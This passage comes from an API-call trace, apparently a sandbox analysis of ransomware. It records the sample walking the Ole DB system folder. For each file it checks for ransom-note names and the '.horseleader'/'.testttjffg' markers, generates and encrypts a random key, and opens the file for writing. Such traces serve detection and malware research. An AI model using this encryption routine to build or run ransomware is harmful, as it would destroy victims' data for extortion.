ftLastAccessTime.dwLowDateTime=0x14cd0c35, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x349a6d70, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x6a000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdaps.dll", cAlternateFileName="")) returned 1 [0251.294] lstrcmpiW (lpString1="msdaps.dll", lpString2="Windows") returned -1 [0251.294] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned 58 [0251.294] StrStrIW (lpFirst="msdaps.dll", lpSrch=".horseleader") returned 0x0 [0251.294] lstrcmpW (lpString1="msdaps.dll", lpString2="#Decrypt#.txt") returned 1 [0251.294] lstrcmpW (lpString1="msdaps.dll", lpString2="_uninstalling_.png") returned 1 [0251.294] lstrlenW (lpString=".testttjffg") returned 11 [0251.294] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll", lpSrch=".testttjffg") returned 0x0 [0251.295] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.295] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.295] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.296] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86c0138a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x86c0138a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x86c0138a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb6000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdasql.dll", cAlternateFileName="")) returned 1 [0251.296] lstrcmpiW (lpString1="msdasql.dll", lpString2="Windows") returned -1 [0251.296] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll") returned 59 [0251.296] StrStrIW (lpFirst="msdasql.dll", lpSrch=".horseleader") returned 0x0 [0251.296] lstrcmpW (lpString1="msdasql.dll", lpString2="#Decrypt#.txt") returned 1 [0251.296] lstrcmpW (lpString1="msdasql.dll", lpString2="_uninstalling_.png") returned 1 [0251.296] lstrlenW (lpString=".testttjffg") returned 11 [0251.296] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll", lpSrch=".testttjffg") returned 0x0 [0251.296] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.296] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.296] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasql.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.297] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ab69cf, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x2ab69cf, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x838ac7b0, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0xf000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdasqlr.dll", cAlternateFileName="")) returned 1 [0251.297] lstrcmpiW (lpString1="msdasqlr.dll", lpString2="Windows") returned -1 [0251.297] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll") returned 60 [0251.297] StrStrIW (lpFirst="msdasqlr.dll", lpSrch=".horseleader") returned 0x0 [0251.297] lstrcmpW (lpString1="msdasqlr.dll", lpString2="#Decrypt#.txt") returned 1 [0251.297] lstrcmpW (lpString1="msdasqlr.dll", lpString2="_uninstalling_.png") returned 1 [0251.297] lstrlenW (lpString=".testttjffg") returned 11 [0251.297] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll", lpSrch=".testttjffg") returned 0x0 [0251.297] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.297] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.297] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasqlr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.297] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc3c3a6b, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfc3c3a6b, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x349f2860, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x20000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdatl3.dll", cAlternateFileName="")) returned 1 [0251.297] lstrcmpiW (lpString1="msdatl3.dll", lpString2="Windows") returned -1 [0251.297] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll") returned 59 [0251.297] StrStrIW (lpFirst="msdatl3.dll", lpSrch=".horseleader") returned 0x0 [0251.297] lstrcmpW (lpString1="msdatl3.dll", lpString2="#Decrypt#.txt") returned 1 [0251.297] lstrcmpW (lpString1="msdatl3.dll", lpString2="_uninstalling_.png") returned 1 [0251.297] lstrlenW (lpString=".testttjffg") returned 11 [0251.297] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll", lpSrch=".testttjffg") returned 0x0 [0251.298] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.298] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.298] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdatl3.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.298] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d2cdc0, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x1d2cdc0, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x383128c0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x9000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msxactps.dll", cAlternateFileName="")) returned 1 [0251.298] lstrcmpiW (lpString1="msxactps.dll", lpString2="Windows") returned -1 [0251.298] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll") returned 60 [0251.298] StrStrIW (lpFirst="msxactps.dll", lpSrch=".horseleader") returned 0x0 [0251.298] lstrcmpW (lpString1="msxactps.dll", lpString2="#Decrypt#.txt") returned 1 [0251.298] lstrcmpW (lpString1="msxactps.dll", lpString2="_uninstalling_.png") returned 1 [0251.298] lstrlenW (lpString=".testttjffg") returned 11 [0251.298] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll", lpSrch=".testttjffg") returned 0x0 [0251.298] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.298] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.298] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msxactps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.299] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84c2ad0f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x84c2ad0f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x84c50e6f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10d000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="oledb32.dll", cAlternateFileName="")) returned 1 [0251.299] lstrcmpiW (lpString1="oledb32.dll", lpString2="Windows") returned -1 [0251.300] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll") returned 59 [0251.300] StrStrIW (lpFirst="oledb32.dll", lpSrch=".horseleader") returned 0x0 [0251.300] lstrcmpW (lpString1="oledb32.dll", lpString2="#Decrypt#.txt") returned 1 [0251.300] lstrcmpW (lpString1="oledb32.dll", lpString2="_uninstalling_.png") returned 1 [0251.300] lstrlenW (lpString=".testttjffg") returned 11 [0251.300] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll", lpSrch=".testttjffg") returned 0x0 [0251.300] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.300] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.300] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.300] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfabf604b, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfabf604b, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0xdf9a48f0, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x14000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="oledb32r.dll", cAlternateFileName="")) returned 1 [0251.300] lstrcmpiW (lpString1="oledb32r.dll", lpString2="Windows") returned -1 [0251.300] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll") returned 60 [0251.300] StrStrIW (lpFirst="oledb32r.dll", lpSrch=".horseleader") returned 0x0 [0251.301] lstrcmpW (lpString1="oledb32r.dll", lpString2="#Decrypt#.txt") returned 1 [0251.301] lstrcmpW (lpString1="oledb32r.dll", lpString2="_uninstalling_.png") returned 1 [0251.301] lstrlenW (lpString=".testttjffg") returned 11 [0251.301] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll", lpSrch=".testttjffg") returned 0x0 [0251.301] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.301] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.301] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32r.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.301] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa542845b, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0xa542845b, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0xa4ffde2f, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0x264c, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="oledbjvs.inc", cAlternateFileName="")) returned 1 [0251.301] lstrcmpiW (lpString1="oledbjvs.inc", lpString2="Windows") returned -1 [0251.301] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 60 [0251.301] StrStrIW (lpFirst="oledbjvs.inc", lpSrch=".horseleader") returned 0x0 [0251.301] lstrcmpW (lpString1="oledbjvs.inc", lpString2="#Decrypt#.txt") returned 1 [0251.301] lstrcmpW (lpString1="oledbjvs.inc", lpString2="_uninstalling_.png") returned 1 [0251.301] lstrlenW (lpString=".testttjffg") returned 11 [0251.302] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc", lpSrch=".testttjffg") returned 0x0 [0251.302] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.302] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.302] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.303] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa542845b, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0xa542845b, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0xa52d1816, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0x26f7, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="oledbvbs.inc", cAlternateFileName="")) returned 1 [0251.303] lstrcmpiW (lpString1="oledbvbs.inc", lpString2="Windows") returned -1 [0251.303] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 60 [0251.303] StrStrIW (lpFirst="oledbvbs.inc", lpSrch=".horseleader") returned 0x0 [0251.303] lstrcmpW (lpString1="oledbvbs.inc", lpString2="#Decrypt#.txt") returned 1 [0251.303] lstrcmpW (lpString1="oledbvbs.inc", lpString2="_uninstalling_.png") returned 1 [0251.303] lstrlenW (lpString=".testttjffg") returned 11 [0251.303] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc", lpSrch=".testttjffg") returned 0x0 [0251.303] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.303] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.303] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.303] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92f0bf91, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x92f0bf91, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x92f320f1, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x128000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="sqloledb.dll", cAlternateFileName="")) returned 1 [0251.303] lstrcmpiW (lpString1="sqloledb.dll", lpString2="Windows") returned -1 [0251.304] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll") returned 60 [0251.304] StrStrIW (lpFirst="sqloledb.dll", lpSrch=".horseleader") returned 0x0 [0251.304] lstrcmpW (lpString1="sqloledb.dll", lpString2="#Decrypt#.txt") returned 1 [0251.304] lstrcmpW (lpString1="sqloledb.dll", lpString2="_uninstalling_.png") returned 1 [0251.304] lstrlenW (lpString=".testttjffg") returned 11 [0251.304] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll", lpSrch=".testttjffg") returned 0x0 [0251.304] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.304] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.304] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.304] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc9350f, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xcc9350f, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0xcc210f8, ftLastWriteTime.dwHighDateTime=0x1ca041a, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="sqloledb.rll", cAlternateFileName="")) returned 1 [0251.304] lstrcmpiW (lpString1="sqloledb.rll", lpString2="Windows") returned -1 [0251.304] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll") returned 60 [0251.304] StrStrIW (lpFirst="sqloledb.rll", lpSrch=".horseleader") returned 0x0 [0251.305] lstrcmpW (lpString1="sqloledb.rll", lpString2="#Decrypt#.txt") returned 1 [0251.305] lstrcmpW (lpString1="sqloledb.rll", lpString2="_uninstalling_.png") returned 1 [0251.305] lstrlenW (lpString=".testttjffg") returned 11 [0251.305] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll", lpSrch=".testttjffg") returned 0x0 [0251.305] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.305] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.305] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.305] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f7e4bf, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x14f7e4bf, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x44773fc0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x59000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="sqlxmlx.dll", cAlternateFileName="")) returned 1 [0251.305] lstrcmpiW (lpString1="sqlxmlx.dll", lpString2="Windows") returned -1 [0251.305] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll") returned 59 [0251.305] StrStrIW (lpFirst="sqlxmlx.dll", lpSrch=".horseleader") returned 0x0 [0251.305] lstrcmpW (lpString1="sqlxmlx.dll", lpString2="#Decrypt#.txt") returned 1 [0251.305] lstrcmpW (lpString1="sqlxmlx.dll", lpString2="_uninstalling_.png") returned 1 [0251.305] lstrlenW (lpString=".testttjffg") returned 11 [0251.305] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll", lpSrch=".testttjffg") returned 0x0 [0251.305] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.306] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.306] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.306] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9e5c85, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc9e5c85, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0xc97386e, ftLastWriteTime.dwHighDateTime=0x1ca041a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="sqlxmlx.rll", cAlternateFileName="")) returned 1 [0251.306] lstrcmpiW (lpString1="sqlxmlx.rll", lpString2="Windows") returned -1 [0251.306] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll") returned 59 [0251.306] StrStrIW (lpFirst="sqlxmlx.rll", lpSrch=".horseleader") returned 0x0 [0251.306] lstrcmpW (lpString1="sqlxmlx.rll", lpString2="#Decrypt#.txt") returned 1 [0251.306] lstrcmpW (lpString1="sqlxmlx.rll", lpString2="_uninstalling_.png") returned 1 [0251.306] lstrlenW (lpString=".testttjffg") returned 11 [0251.306] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll", lpSrch=".testttjffg") returned 0x0 [0251.306] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.306] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.307] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.307] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc7a4200, ftCreationTime.dwHighDateTime=0x1c8e202, ftLastAccessTime.dwLowDateTime=0x5f34af90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbc7a4200, ftLastWriteTime.dwHighDateTime=0x1c8e202, nFileSizeHigh=0x0, nFileSizeLow=0x44e18, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="xmlrw.dll", cAlternateFileName="")) returned 1 [0251.307] lstrcmpiW (lpString1="xmlrw.dll", lpString2="Windows") returned 1 [0251.307] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole 